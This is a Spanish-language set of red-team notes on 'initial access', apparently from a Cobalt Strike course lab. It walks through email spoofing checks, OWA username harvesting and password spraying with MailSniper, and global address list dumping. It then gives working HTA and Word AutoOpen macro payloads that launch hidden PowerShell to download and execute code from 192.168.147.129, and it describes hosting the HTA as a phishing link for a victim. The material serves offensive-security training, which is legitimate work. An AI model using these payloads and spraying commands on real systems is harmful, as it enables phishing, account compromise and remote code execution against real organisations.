Initial Access

Initial Access

SpoofCheck

SpoofCheck para verificar la seguridad del mail.

python3 spoofcheck.py cyberbotic.io
[+] cyberbotic.io has no SPF record!
[*] No DMARC record found. Looking for organizational record
[+] No organizational DMARC record
[+] Spoofing possible for cyberbotic.io!

MailSniper

Enumeracion del NetBIOS name del Servidor Exchange.

ipmo c:\Tools\MailSniper.ps1
Invoke-DomainHarvestOWA -ExchHostname 10.10.15.100

Namemash

Crear lista de usuarios con el primer y segundo nombre.

name.txt
Bob Farmer
Isabel Yates
John King
Joyce Adams
python3 namemash.py names.txt >> usernames.txt

Enumeracion de usuarios de OWA.

Invoke-UsernameHarvestOWA -ExchHostname 10.10.15.100 -Domain CYBER -UserList usernames.txt -Outfile valid.txt

Password Spraying con las cuentas validas.

Invoke-PasswordSprayOWA -ExchHostname 10.10.15.100 -UserList valid.txt -Password Summer2021

Obtener lista de correos una vez obtenemos un password valido.

Get-GlobalAddressList -ExchHostname 10.10.15.100 -UserName CYBER\iyates -Password Summer2021 -Outfile emails.txt

HTML Application (HTA)

Los archivos HTA (HTML Application) son archivos que contienen código HTML combinado con elementos de programación de Microsoft JScript o VBScript. Estos archivos tienen la extensión .hta y se utilizan para crear aplicaciones web con una interfaz gráfica de usuario (GUI) similar a las aplicaciones de escritorio, pero dentro del entorno de Windows.

Con CobaltStrike podemos generar un comando powershell para que descargue el payload.

Attacks -> Scripted Web Delivery (S)

Nuestro HTA file se vera asi sin embargo esto solo funciona para sistemas x86.

<html>
  <head>
    <title>Hello World</title>
  </head>
  <body>
    <h2>Hello World</h2>
    <p>This is an HTA...</p>
  </body>

  <script language="VBScript">
    Function Pwn()
      Set shell = CreateObject("wscript.Shell")
      shell.run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://192.168.147.129:80/a'))"""
    End Function

    Pwn
  </script>
</html>

Por lo tanto necesitamos modificarlo de la siguiente forma para que se ejecute en sistemas x64.

<html>
  <head>
    <title>Hello World</title>
  </head>
  <body>
    <h2>Hello World</h2>
    <p>This is an HTA...</p>
  </body>

  <script language="VBScript">
    Function Pwn()
      Set shell = CreateObject("wscript.Shell")
      shell.run "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://192.168.147.129:80/a'))"""
    End Function

    Pwn
  </script>
</html>

Note

Si al momento de cambiar de payload no regresa la conexion al listener ve a la pestania de Listeners selecciona el que configuraste y da clic en la opcion Restart.

Visual Basic for Applications (VBA) Macro’s

Visual Basic for Applications (VBA) es un lenguaje de programación que se utiliza dentro de las aplicaciones de Microsoft, como Excel, Word, PowerPoint, entre otras. Cuando hablamos de Macros VBA, nos referimos a pequeños programas o scripts que puedes escribir o grabar en aplicaciones como Excel para automatizar procesos.

Podemos realizar algo similar a los HTA pero con Macros de la siguiente forma.

Sub AutoOpen()

    Dim Shell As Object
    Set Shell = CreateObject("wscript.shell")
    Shell.Run "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://192.168.147.129:80/a'))"""

End Sub

Esta macro se almacena en un archivo de word y al momento de guardarlo se debe seleccionar la extension .doc ya que no es posible guardar macros en documentos tipo .docx.

HTA Phish

Tambien es posible realizar hosting de un archivo HTA para solo compartir el link.

Site Management -> Host File

El link que genere lo podemos compartir a nuestra victima para que lo ejecute.